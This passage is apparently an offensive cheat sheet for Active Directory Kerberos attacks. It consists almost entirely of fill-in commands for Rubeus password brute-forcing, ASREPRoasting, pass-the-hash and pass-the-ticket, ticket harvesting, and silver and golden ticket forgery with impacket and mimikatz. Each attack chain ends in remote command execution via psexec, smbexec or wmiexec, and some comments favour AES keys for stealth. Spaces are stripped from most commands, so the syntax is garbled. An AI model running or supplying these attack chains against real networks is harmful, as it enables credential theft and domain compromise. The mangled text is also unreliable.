# with a list of users.\Rubeus.exebrute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exebrute/passwords:<passwords_file>/outfile:<output_file>
# check ASREPRoast for all domain users (credentials required)pythonGetNPUsers.py<domain_name>/<domain_user>:<domain_user_password>-request-format<AS_REP_responses_format [hashcat |john]> -outputfile<output_AS_REP_responses_file># check ASREPRoast for a list of users (no credentials required)pythonGetNPUsers.py<domain_name>/-usersfile<users_file>-format<AS_REP_responses_format [hashcat |john]> -outputfile<output_AS_REP_responses_file>
# check ASREPRoast for all users in current domain.\Rubeus.exeasreproast/format:<AS_REP_responses_format [hashcat |john]> /outfile:<output_hashes_file>
# Request the TGT with hashpythongetTGT.py<domain_name>/<user_name>-hashes [lm_hash]:<ntlm_hash># Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)pythongetTGT.py<domain_name>/<user_name>-aesKey<aes_key># Request the TGT with passwordpythongetTGT.py<domain_name>/<user_name>:[password]# If not provided, password is asked# Set the TGT for impacket useexport KRB5CCNAME=<TGT_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# Ask and inject the ticket.\Rubeus.exeasktgt/domain:<domain_name>/user:<user_name>/rc4:<ntlm_hash>/ptt# Execute a cmd in the remote machine.\PsExec.exe-accepteula \\<remote_hostname>cmd
Pass The Ticket (PTT)
Harvest tickets from Linux
Check type and location of tickets:
grepdefault_ccache_name/etc/krb5.conf
If none return, default is FILE:/tmp/krb5cc_%{uid}.
In case of file tickets, you can copy-paste (if you have permissions) for use them.
In case of being KEYRING tickets, you can use tickey to get them:
# To dump current user tickets, if root, try to dump them all by injecting in other user processes# to inject, copy tickey in a reachable folder by all userscptickey/tmp/tickey/tmp/tickey-i
.\Rubeusdump# After dump with Rubeus tickets in base64, to write the in a file[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
# Set the ticket for impacket useexport KRB5CCNAME=<TGT_ccache_file_path># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# To generate the TGS with NTLMpythonticketer.py-nthash<ntlm_hash>-domain-sid<domain_sid>-domain<domain_name>-spn<service_spn><user_name># To generate the TGS with AES keypythonticketer.py-aesKey<aes_key>-domain-sid<domain_sid>-domain<domain_name>-spn<service_spn><user_name># Set the ticket for impacket useexport KRB5CCNAME=<TGS_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# To generate the TGS with NTLMmimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># To generate the TGS with AES 128 keymimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)mimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># Inject TGS with Mimikatzmimikatz# kerberos::ptt <ticket_kirbi_file>
# To generate the TGT with NTLMpythonticketer.py-nthash<krbtgt_ntlm_hash>-domain-sid<domain_sid>-domain<domain_name><user_name># To generate the TGT with AES keypythonticketer.py-aesKey<aes_key>-domain-sid<domain_sid>-domain<domain_name><user_name># Set the ticket for impacket useexport KRB5CCNAME=<TGS_ccache_file># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
# To generate the TGT with NTLMmimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name># To generate the TGT with AES 128 keymimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name># To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)mimikatz# kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name># Inject TGT with Mimikatzmimikatz# kerberos::ptt <ticket_kirbi_file>